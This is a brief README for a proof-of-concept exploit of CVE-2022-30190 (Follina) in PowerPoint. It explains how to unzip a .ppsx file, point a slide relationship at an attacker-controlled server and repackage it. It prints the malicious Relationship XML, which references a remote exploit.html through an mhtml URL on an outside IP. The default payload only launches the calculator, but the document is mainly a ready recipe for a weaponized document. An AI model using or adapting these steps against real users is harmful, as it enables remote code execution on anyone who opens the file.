This is exploit of CVE-2022-30190 on PowerPoint.
Modify the suffix of the file to 'zip' and unzip the file, you can edit \ppt\slides\_rels\slide1.xml.rels
and replace to your vps ip:port like this, then compress them as the same way and change the suffix to 'ppsx'. The default payload in 'exploit.html' is to execute the calc
.
<Relationship TargetMode="External" Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://114.114.114.114:80/exploit.html!x-usc:http://114.114.114.114:80/exploit.html"/>